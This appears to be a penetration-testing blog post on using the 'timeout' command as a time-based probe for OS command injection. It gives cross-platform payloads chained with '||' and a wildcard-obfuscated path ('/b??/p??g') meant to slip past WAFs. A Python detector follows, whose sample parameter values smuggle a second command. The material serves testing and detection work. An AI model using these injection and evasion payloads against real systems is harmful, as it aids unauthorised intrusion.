Diversify Attack Vectors via Time Management

I've recently learned about the "Timeout" function while working with cmd.exe and wanted to share this quick post with you.

When I looked at the Timeout help page via the "Timeout /?" command on Windows, I discovered that the Timeout function can delay any system function for X seconds with the "/T X" option. On Linux, it does something similar with "timeout Xs".

We could delay the system via the Timeout function. Then, I got an idea! Maybe I could create an alternative to attack vectors such as Ping or Sleep in this way. It seems like we can do this in very different ways. When we run the command, we might get some syntax errors, but I assume that some of the code will work. Now let's try to use this information to develop attack vectors.

Windows examples are as follows:

Timeout /T 1
waiting for 1 sec
Timeout 1
waiting for 1 sec

Linux examples are as follows:

timeout 1
I got the error “Try 'timeout --help' for more information.”
timeout 1s sleep 5
waiting for 1 sec. The “Sleep” command is not working.
timeout 1 sleep 5
waiting for 1 sec. The “Sleep” command is not working.
timeout 3 ping -n 127.0.0.1
The ping command worked 3 times.
timeout 0 ping -n 3 127.0.0.1
I got the error “connect : Invalid argument”.

For both Linux and Windows, we have created some payloads above. Now let's try to create an attack vector that will work in both operating systems. To accomplish this, we divide the command into two using the "||" (double pipe) operator, which runs the command on its right only when the command on its left fails.

Windows examples are as follows:

timeout 5 || timeout 1 sleep 5
The command on the left of the double pipe worked.
timeout /T 5 || timeout 1 sleep 5
The command on the left of the double pipe worked.

Linux examples are as follows:

timeout 5 || timeout 1 sleep 5
The command didn’t work on the left. I got the error “Try 'timeout --help' for more information.” but waited for 1 second on the right.
timeout 5 || timeout 0 sleep 5
The command didn’t work on the left. I got the error “Try 'timeout --help' for more information.” but waited for 5 seconds on the right using the sleep command.

As we have seen in this section, we have developed a few examples that worked in both operating systems, and then I created an issue in the Commix repository for these attack vectors (Commix - GitHub Issues). Maybe the Timeout function can be used for WAF bypass detection in the OOB (Out Of Band) payload, which is time-based detection in the vulnerability detection phase.

For example:

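We could create other variants of the code below for WAF bypass while testing OS Command Injection. Also, the “?” symbol triggers bash's guess mechanism (pathname expansion): each “?” stands in for any single character of a file name, so the shell fills in the matching path itself.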

timeout 3 /b??/p??g -n 127.0.0.1
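
Seen from the detection side, the variants above (timeout as a delay primitive, "||" chaining, and "?" wildcards in the binary path) can be matched in request parameters. The following is an added example, not code from the original post or from Commix; the function name, reason labels, binary paths and sample values are assumptions constructed for illustration.

```python
import fnmatch
import re
from urllib.parse import unquote_plus

# Delay-capable binaries named on the page; these install paths are assumptions.
DELAY_BINARIES = ["/bin/ping", "/bin/sleep", "/bin/timeout",
                  "/usr/bin/ping", "/usr/bin/sleep", "/usr/bin/timeout"]
# "timeout 5", "timeout /T 5", "timeout 1s ..."; case-insensitive like cmd.exe
TIMEOUT_RE = re.compile(r"\btimeout\s+(?:/t\s+)?\d+[smhd]?\b", re.IGNORECASE)
SLEEP_RE = re.compile(r"\bsleep\s+\d+", re.IGNORECASE)
PING_RE = re.compile(r"\bping\s+-[nc]\b", re.IGNORECASE)
# Path-like token containing shell wildcards, e.g. /b??/p??g
GLOB_TOKEN_RE = re.compile(r"(?<!\S)/[\w./?*\[\]-]*[?*][\w./?*\[\]-]*")


def classify(value):
    """Return sorted reasons why a request parameter looks like a delay probe."""
    text = unquote_plus(value)
    reasons = set()
    if TIMEOUT_RE.search(text):
        reasons.add("timeout-delay")
    if SLEEP_RE.search(text):
        reasons.add("sleep-delay")
    if PING_RE.search(text):
        reasons.add("ping-delay")
    if "||" in text and reasons:
        reasons.add("or-chained")
    for token in GLOB_TOKEN_RE.findall(text):
        # Resolve the wildcard the way the shell would, against known binaries.
        if any(fnmatch.fnmatchcase(path, token) for path in DELAY_BINARIES):
            reasons.add("globbed-binary")
    return sorted(reasons)


# Constructed sample parameter values, URL-encoded as in an access log.
SAMPLES = [
    "127.0.0.1",
    "127.0.0.1%3Btimeout+%2FT+5",
    "x%7C%7Ctimeout+5+%7C%7C+timeout+1+sleep+5",
    "x%3Btimeout+3+%2Fb%3F%3F%2Fp%3F%3Fg+-n+127.0.0.1",
    "session+timeout+settings",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample!r:55} -> {classify(sample)}")
```

The last sample shows that the word "timeout" alone in ordinary text is not flagged; only the command shape with a numeric duration is.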

Have fun!

Special thanks to Zinnur Yeşilyurt